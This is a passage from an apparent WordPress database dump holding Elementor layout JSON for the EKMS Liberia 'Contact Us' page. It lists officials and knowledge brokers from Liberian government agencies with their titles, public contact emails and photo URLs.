href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24561,3626,'_elementor_edit_mode','builder'),(24562,3626,'_elementor_template_type','wp-page'),(24563,3626,'_elementor_version','3.0.16'),(24564,3626,'_wp_page_template','default'),(24565,3626,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\